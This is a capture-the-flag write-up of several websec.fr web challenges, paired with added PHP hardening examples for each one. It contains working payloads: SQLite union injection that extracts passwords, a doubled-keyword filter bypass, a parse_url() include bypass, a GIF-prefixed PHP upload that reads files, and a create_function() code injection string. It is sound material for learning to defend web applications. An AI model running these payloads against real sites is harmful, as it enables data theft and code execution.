An overseas platform. I had seen a teammate mention earlier that it has a lot of quirky tricks, and since I was stuck on the BUU challenges anyway, I came over to try some.
babysteps
Level01
SQLite injection.

1 order by 2                                                  # column count is 2
-1 union select 1,2                                           # columns 1 and 2 are echoed
-1 union select 1,name from sqlite_master WHERE type='table'  # gives the table name: users
-1 union select 1,sql from sqlite_master WHERE type='table'   # gives the table structure: CREATE TABLE users(id int(7), username varchar(255), password varchar(255))
-1 union select 1,password from users where id=1              # gives the flag
Level04
The source was provided.
<?php
include 'connect.php';

$sql = new SQL();
$sql->connect();
$sql->query = 'SELECT username FROM users WHERE id=';

if (isset ($_COOKIE['leet_hax0r'])) {
    // session data is deserialized straight from the client-controlled cookie
    $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
    try {
        if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
            die('CANT HACK US!!!');
        }
    } catch(Exception $e) {
        echo $e;
    }
} else {
    $cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;
    setcookie ('leet_hax0r', $cookie, time () + (86400 * 30));
}

if (isset ($_REQUEST['id']) && is_numeric ($_REQUEST['id'])) {
    try {
        $sql->query .= $_REQUEST['id'];
    } catch(Exception $e) {
        echo ' Invalid query';
    }
}

<?php
// connect.php (the file included above)
class SQL {
    public $query = '';
    public $conn;

    public function __construct() {
    }

    public function connect() {
        $this->conn = new SQLite3 ("database.db", SQLITE3_OPEN_READONLY);
    }

    public function SQL_query($query) {
        $this->query = $query;
    }

    public function execute() {
        return $this->conn->query ($this->query);
    }

    // runs whatever is in $this->query when the object is destroyed
    public function __destruct() {
        if (!isset ($this->conn)) {
            $this->connect ();
        }
        $ret = $this->execute ();
        if (false !== $ret) {
            while (false !== ($row = $ret->fetchArray (SQLITE3_ASSOC))) {
                echo '';
            }
        }
    }
}
After auditing it: the cookie first goes through unserialize(), and then execution reaches the SQL class.
Just construct the object.
Replace the cookie and you get the flag.
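As an added example (not the challenge's code), here is how the Level04 cookie could have been handled so that a forged serialized object never reaches unserialize(). Two controls are combined: an HMAC over the payload with a key only the server knows, and allowed_classes=false so that even a payload that passes the MAC can only yield arrays and scalars, never an object with a __destruct(). SESSION_KEY and the IP values are constructed samples.

```php
<?php
// Added example, not the challenge's code. Demonstrates authenticated,
// class-free cookie handling for the Level04 pattern.
// SESSION_KEY is a constructed sample; a real deployment loads it from config.
const SESSION_KEY = 'constructed-sample-key-change-me';

function makeSessionCookie(array $data): string {
    $payload = base64_encode(serialize($data));
    $mac = hash_hmac('sha256', $payload, SESSION_KEY);
    return $payload . '.' . $mac;
}

// Returns the session array, or null when the cookie is missing, tampered with, or not an array.
function readSessionCookie(?string $cookie): ?array {
    if ($cookie === null || strpos($cookie, '.') === false) {
        return null;
    }
    [$payload, $mac] = explode('.', $cookie, 2);
    $expected = hash_hmac('sha256', $payload, SESSION_KEY);
    if (!hash_equals($expected, $mac)) {        // constant-time comparison
        return null;
    }
    $raw = base64_decode($payload, true);
    if ($raw === false) {
        return null;
    }
    // Even after the MAC check, refuse to instantiate any class at all.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

// --- demonstration with constructed values ---
$good = makeSessionCookie(['ip' => '203.0.113.5']);
var_dump(readSessionCookie($good));           // array(1) { ["ip"]=> string(11) "203.0.113.5" }

// A client that swaps in its own serialized payload without the key:
// the MAC no longer matches, so the cookie is rejected before unserialize() runs.
$forged = base64_encode(serialize(['ip' => '203.0.113.5', 'role' => 'admin'])) . '.' . str_repeat('0', 64);
var_dump(readSessionCookie($forged));         // NULL

// Without the MAC, allowed_classes=false alone turns any object payload into
// __PHP_Incomplete_Class, which is not an array, so the reader still fails closed.
$objectPayload = 'O:8:"stdClass":0:{}';
var_dump(@unserialize($objectPayload, ['allowed_classes' => false]) instanceof __PHP_Incomplete_Class); // bool(true)
```

The point of the MAC is that the ip check in the original is a check on data the client wrote; with the MAC, the client cannot change the payload at all without the server noticing, and allowed_classes=false is the backstop in case the key ever leaks.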
Level17
One array and done.
strcasecmp() returns 0 when handed an array, which satisfies the condition.
Level25
<?php
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}
include $_GET['page'] . '.txt';
The problem is parse_url(): given a URL it cannot parse, it returns false, so $query stays empty, the keyword loop never runs, and include still uses $_GET['page'] untouched.
payload: page=flag&:80
Or use
http://websec.fr///level25/index.php?page=flag
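As an added example (not the challenge's code), the root cause of Level25 is a parser mismatch: the filter inspects parse_url(REQUEST_URI)['query'] while the include consumes $_GET, and the two disagree whenever parse_url() gives up. The version below validates the very array it is about to use and allowlists the page name instead of blacklisting a word. PAGES is a constructed allowlist; the real site's page names are not known from the write-up.

```php
<?php
// Added example, not the challenge's code. Fixes the Level25 pattern by
// (a) checking the same array the include() consumes, (b) allowlisting
// page names rather than searching for "flag", (c) never building a path
// from raw input. PAGES is a constructed allowlist.
const PAGES = ['home', 'about', 'contact'];

function resolvePage(array $get): ?string {
    $page = $get['page'] ?? 'home';
    // Only an exact, known name passes; "flag", "../x" and "php://..." all fail here.
    if (!in_array($page, PAGES, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $page . '.txt';
}

// Show what parse_url() makes of the two request lines from the write-up.
// Whenever it returns false, the original filter loop had nothing to iterate,
// while $_GET['page'] was still "flag" for the include().
foreach (['/level25/index.php?page=flag&:80', '///level25/index.php?page=flag'] as $uri) {
    echo $uri, ' => parse_url: ', var_export(parse_url($uri), true), PHP_EOL;
}

// The hardened resolver does not depend on how parse_url() reads the URI at all:
var_dump(resolvePage(['page' => 'flag']));   // NULL: not on the allowlist
var_dump(resolvePage(['page' => 'about']));  // string: ".../pages/about.txt"
```

Whether parse_url() returns false for a given request depends on the PHP version, which is exactly why a filter must not be built on a different parse of the input than the code it protects.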
Level28
<?php
if(isset($_POST['submit'])) {
    if ($_FILES['flag_file']['size'] > 4096) {
        die('Your file is too heavy.');
    }
    $filename = md5($_SERVER['REMOTE_ADDR']) . '.php';
    $fp = fopen($_FILES['flag_file']['tmp_name'], 'r');
    $flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name']));
    @fclose($fp);
    file_put_contents($filename, $flagfilecontent);
    if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) {
        include($filename); // it contains the $flag variable
    } else {
        $flag = "Nope, $filename is not the right file, sorry.";
        sleep(1); // Deter bruteforce
    }
    unlink($filename);
}
A race-condition challenge.
I did not manage to reproduce it.
easy
Level02
Same as Level01, except that union, order, select, from, group and by are filtered. Doubling each keyword is enough.
-1 uniunionon seselectlect 1,password frfromom users where id=1
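As an added example (not the challenge's code) covering both Level01 and Level02, here is the query pattern rebuilt against an in-memory SQLite database, with three lookups side by side: plain concatenation, a one-pass keyword blacklist of the kind the doubled payload defeats, and a prepared statement. The table layout is the one the write-up recovered from sqlite_master; the row contents and the two-column SELECT are constructed sample data.

```php
<?php
// Added example, not the challenge's code. The table is the one the
// write-up found in sqlite_master; rows and the flag value are constructed.
function buildDb(): SQLite3 {
    $db = new SQLite3(':memory:');
    $db->exec('CREATE TABLE users(id int(7), username varchar(255), password varchar(255))');
    $db->exec("INSERT INTO users VALUES (1, 'admin', 'FLAG{constructed-sample}')");
    $db->exec("INSERT INTO users VALUES (2, 'guest', 'guest')");
    return $db;
}

function collect(SQLite3Result $res): array {
    $rows = [];
    while (($row = $res->fetchArray(SQLITE3_ASSOC)) !== false) {
        $rows[] = $row['username'];   // the column a page would echo
    }
    return $rows;
}

// Vulnerable (Level01 shape): the id is pasted into the SQL text.
// Two result columns, matching the "order by 2" finding in the write-up.
function lookupUnsafe(SQLite3 $db, string $id): array {
    $res = @$db->query('SELECT id, username FROM users WHERE id=' . $id);
    return $res === false ? [] : collect($res);
}

// Still vulnerable (Level02 shape): a keyword blacklist applied once.
// Stripping "union" from "uniunionon" leaves "union" behind.
function lookupFiltered(SQLite3 $db, string $id): array {
    $banned = ['union', 'order', 'select', 'from', 'group', 'by'];
    return lookupUnsafe($db, str_ireplace($banned, '', $id));
}

// Hardened: the id is validated and bound as an integer; it can never become SQL.
function lookupSafe(SQLite3 $db, string $id): array {
    if (!preg_match('/^[0-9]+$/', $id)) {
        return [];                          // anything but a plain integer is refused
    }
    $stmt = $db->prepare('SELECT id, username FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int)$id, SQLITE3_INTEGER);
    return collect($stmt->execute());
}

$db = buildDb();
$payload = '-1 union select 1,password from users where id=1';                   // from the write-up
$doubled = '-1 uniunionon seselectlect 1,password frfromom users where id=1';    // from the write-up

var_dump(lookupUnsafe($db, $payload));    // ["FLAG{constructed-sample}"]: password shows up in the username column
var_dump(lookupFiltered($db, $doubled));  // ["FLAG{constructed-sample}"]: blacklist removed once, payload reassembles
var_dump(lookupSafe($db, $payload));      // []: rejected by the integer check
var_dump(lookupSafe($db, '1'));           // ["admin"]
```

The blacklist case is the one worth remembering: a filter that runs once over the input is not a fix, because the input can be shaped so that the removal itself produces the banned token. Binding the value leaves nothing to filter.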
Level08
文件包含,会检测gif头
GIF89a
<?php var_dump(scandir('./')); ?>
That turns up flag.txt.
Just read it.
GIF89a
<?php var_dump(file_get_contents('flag.txt')); ?>
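As an added example (not the challenges' code) covering Level08 and Level28 together, here is an upload handler that removes the conditions both rely on. Level08 only checked for a "GIF89a" prefix, so any PHP file carrying that prefix passed and was later include()d; Level28 wrote the upload to a predictable name inside the web root and only unlink()ed it afterwards, which is the window a race exploits. UPLOAD_DIR is a constructed path; the handler assumes the fileinfo and GD extensions, and nothing it stores is ever include()d or served from the document root.

```php
<?php
// Added example, not the challenges' code. UPLOAD_DIR is constructed and
// must lie outside the document root. Requires ext/fileinfo and ext/gd.
const UPLOAD_DIR = '/var/app/uploads';
const MAX_BYTES  = 4096;
const ALLOWED    = ['image/gif' => 'gif', 'image/png' => 'png', 'image/jpeg' => 'jpg'];

// Stores one entry of $_FILES. Returns the stored path, or null with a reason in $error.
function storeImageUpload(array $file, ?string &$error): ?string {
    $error = null;
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        $error = 'upload failed';
        return null;
    }
    if ($file['size'] > MAX_BYTES) {
        $error = 'too large';
        return null;
    }
    $tmp = $file['tmp_name'];
    // Only trust a file PHP itself received as an upload, not an arbitrary path.
    if (!is_uploaded_file($tmp)) {
        $error = 'not an upload';
        return null;
    }
    // Magic bytes via libmagic AND a real decode: "GIF89a<?php ..." has the
    // right prefix (Level08) but is not a decodable image.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!array_key_exists($mime, ALLOWED) || @imagecreatefromstring(file_get_contents($tmp)) === false) {
        $error = 'not an image';
        return null;
    }
    // Random name, extension chosen by us, directory not web-served:
    // there is no moment at which a request could reach the file as code (Level28).
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($tmp, $dest)) {
        $error = 'store failed';
        return null;
    }
    return $dest;
}

// Level28's "is this the reference file?" question answered without writing the
// upload anywhere: hash the temporary file in place and compare constant-time.
function matchesReference(string $tmp, string $reference): bool {
    $a = hash_file('sha256', $reference);
    $b = hash_file('sha256', $tmp);
    return $a !== false && $b !== false && hash_equals($a, $b);
}

// Typical call site inside a request handler:
// $path = storeImageUpload($_FILES['flag_file'], $why);
// if ($path === null) { http_response_code(400); echo $why; }
```

The design choice that matters most is the last one: the original Level28 code had to unlink() because it had created a web-reachable PHP file; a handler that never creates one has no cleanup step to race.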
Level10
The source was provided.
<?php
if (isset ($_REQUEST['f']) && isset ($_REQUEST['hash'])) {
    $file = $_REQUEST['f'];
    $request = $_REQUEST['hash'];
    $hash = substr (md5 ($flag . $file . $flag), 0, 8);
    echo '';
    if ($request == $hash) {
        show_source ($file);
    } else {
        echo 'Permission denied!';
    }
    echo '';
}
It takes the first eight characters of md5($flag.$file.$flag) and, if the comparison succeeds, prints the file.
Then I was somewhat out of ideas: the flag is unknown, so brute-forcing doesn't really make sense.
Let me look at the write-up!
It seems to be a weak-typing challenge.
Haven't reproduced it yet.
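As an added example (not the challenges' code) covering Level17 and Level10 together, here are the two loose-comparison habits behind them, each next to a strict version. All values are constructed; no challenge secret appears.

```php
<?php
// Added example, not the challenges' code. Constructed values throughout.

// Level17 shape: strcasecmp() on a value that may not be a string. On PHP 7,
// an array makes strcasecmp() emit a warning and return NULL, and NULL == 0 is
// true, so the "wrong password" branch is skipped. PHP 8 throws a TypeError instead.
function checkLoose($supplied, string $secret): bool {
    try {
        return @strcasecmp($supplied, $secret) == 0;
    } catch (TypeError $e) {
        return false;                       // PHP 8 refuses the array outright
    }
}
function checkStrict($supplied, string $secret): bool {
    if (!is_string($supplied)) {
        return false;                       // arrays, null and ints never match
    }
    return hash_equals($secret, $supplied); // exact, constant-time
}

// Level10 shape: a user string compared with an 8-character hash prefix using ==.
// Two numeric-looking strings are compared as numbers, so a prefix of the form
// "0e" followed by digits equals "0", and "1e3" equals "1000".
function hashMatchesLoose(string $supplied, string $prefix): bool {
    return $supplied == $prefix;
}
function hashMatchesStrict(string $supplied, string $prefix): bool {
    return hash_equals($prefix, $supplied);
}

var_dump(checkLoose(['x'], 'hunter2'));          // bool(true) on PHP 7, bool(false) on PHP 8
var_dump(checkStrict(['x'], 'hunter2'));         // bool(false)
var_dump(hashMatchesLoose('0', '0e123456'));     // bool(true): both sides are numeric strings
var_dump(hashMatchesStrict('0', '0e123456'));    // bool(false)
var_dump(hashMatchesLoose('1e3', '1000'));       // bool(true)
var_dump(hashMatchesStrict('1e3', '1000'));      // bool(false)
```

The common fix is the same in both cases: check the type first, then compare with hash_equals() or ===, never with == on anything that came from the request.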
Level11
Don't know how to do this one yet.
Level15
create_function() injection.
I wrote about it before, so I won't go into detail.
;}echo($flag);//
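As an added example (not the challenge's code), this shows why the Level15 payload shape works and what replaces create_function(): building the function body from a request parameter means the parameter is PHP source, so `;}` closes the generated function early and `//` comments out the rest. create_function() is deprecated since PHP 7.2 and removed in PHP 8.0; a closure that captures a validated value never evaluates user input as code. The scaling function and $flag value are constructed stand-ins.

```php
<?php
// Added example, not the challenge's code. $flag is a constructed stand-in.
$flag = 'FLAG{constructed-sample}';

// Vulnerable shape (PHP < 8 only, never called here): the input becomes source text.
function makeScalerUnsafe(string $factor): callable {
    return create_function('$x', 'return $x * ' . $factor . ';');
}

// Safe shape: the input is validated as a number and captured as a value.
function makeScalerSafe(string $factor): ?callable {
    if (!is_numeric($factor)) {
        return null;                         // ";}echo($flag);//" is not a number
    }
    $f = (float)$factor;
    return function (float $x) use ($f): float {
        return $x * $f;
    };
}

$scale = makeScalerSafe('2.5');
var_dump($scale(4));                          // float(10)
var_dump(makeScalerSafe(';}echo($flag);//')); // NULL: rejected before it can become code
```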